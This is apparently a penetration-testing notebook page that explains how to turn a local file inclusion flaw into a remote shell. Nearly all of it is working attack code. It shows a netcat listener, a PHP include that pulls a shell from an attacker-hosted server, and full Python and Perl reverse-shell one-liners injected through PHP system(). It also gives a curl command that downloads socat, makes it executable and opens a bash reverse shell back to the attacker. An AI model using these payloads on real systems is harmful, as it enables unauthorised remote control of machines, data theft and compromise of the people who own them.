Gaining remote shell with LFI2RCE

I explored methods to gain a remote shell on the machine. The following methods can be used (with the VRFY or RCPT TO: command with SMTP explored before) to run remote commands to establish the shell.

The link below contains all the reverse shell payload we will be using:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetpentestmonkey.net

For each of the methods, we need to start a TCP listener on a certain port to catch the shell:

Start the TCP shell listener on a port
$ nc -lvp <port>

1. PHP shell

a. Download the PHP shell from the link above, and load the content into a file such as shell.php (remember to update the host and port values):

  • Start a web server from the same directory as the shell

Python3 web server
$ python3 -m http.server <port>

b. Include the address of the web server to load the PHP shell (using RCE we have found earlier):

<?php include('http://<host>:<port>/shell.php'); ?>

2. Python shell

a. Identify if Python is available

<?php system('python --version'); ?>

b. If available, we can invoke a Python reverse shell:

  • Replace the <host> and <port> with the appropriate values

<?php system("python3 -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<host>',<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);\""); ?>

3. Perl shell

a. Identify if Perl is available:

<?php system('perl --version'); ?>

b. If available, we can invoke a Perl shell:

  • Replace the <host> and <port> with the appropriate values

<?php system('perl -e \'use Socket;$i="<host>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''); ?

4. Socat stable shell

a. Check if Socat is available. However, chances are that it will not be available. We can install the Socat binary and host it from a web server on our machine, and have the target retrieve it.

First, download the Socat binary and host it from the local machine:

$ https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true 

$ python3 -m http.server <port>

Next, we can send the payload to the target:

<?php system('curl http://<host>:8000/socat --output /tmp/socat && chmod +x /tmp/socat &&  /tmp/socat TCP:<host>:8002 EXEC:"bash -li",pty,stderr,sigint,setsid,sane'); ?>

In this payload, a few things are happening:

  1. Retrieve the Socat binary and save it to a temporary directory /tmp/socat

  2. Add execute permission on the binary

  3. Invoke a Socat reverse shell from the target to our machine

  • Note that this shell is considered to be more stable as compared to the other options discussed before

PreviousOther access methodsNextInspecting Express app source code

Last updated